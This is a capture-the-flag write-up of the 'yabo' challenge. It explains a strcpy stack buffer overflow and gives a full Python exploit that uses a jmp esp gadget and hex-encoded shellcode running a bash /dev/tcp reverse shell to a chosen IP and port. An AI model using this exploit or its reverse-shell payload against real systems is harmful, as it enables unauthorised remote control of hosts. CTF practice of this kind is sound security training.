yabo

Yabo was a basic buffer overflow challenge with executable stack.

Files

CTFs/hacktivitycon/2021/yabo at main · 0xTen/CTFsGitHub

The binary

The binary starts a listener on port 9999 and waited for input.

Buffer Overflow

The program copies the input to a 1024 bytes buffer with strcpy and thus has a buffer overflow vulnerability.

We can use a jmp esp gadget to jump to our shellcode and run it.

I used the following shellcode:

Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)Exploit Database

A simple /bin/sh shellcode wouldn't work since the remote process that receives the input is a fork, the shell will be popped on the server but won't receive input through the socket. With the shellcode I used, exploiting is as easy as appending the desired command to the shellcode, so I used a bash + /dev/tcp shell.

Final Exploit

#!/usr/bin/env python
from pwn import *

e = context.binary = ELF('./YABO',checksec=False)

if args.REMOTE:
    io = remote('challenge.ctf.games',32762)
else:
    io = remote('127.0.0.1',9999)

ip = sys.argv[1]
port = sys.argv[2]

buf = 1044*'A'
buf += p32(0x80492e2) # jmp esp
buf += "\x31\xc0\x31\xd2\xb0\x0b\x52\x66\x68\x2d\x63\x89\xe7\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\xeb\x06\x57\x53\x89\xe1\xcd\x80\xe8\xf5\xff\xff\xff\x62\x61\x73\x68\x20\x2d\x63\x20\x22\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f" + ip + "\x2f" + port + "\x20\x30\x3e\x26\x31\x22"

io.sendline(buf)
io.interactive()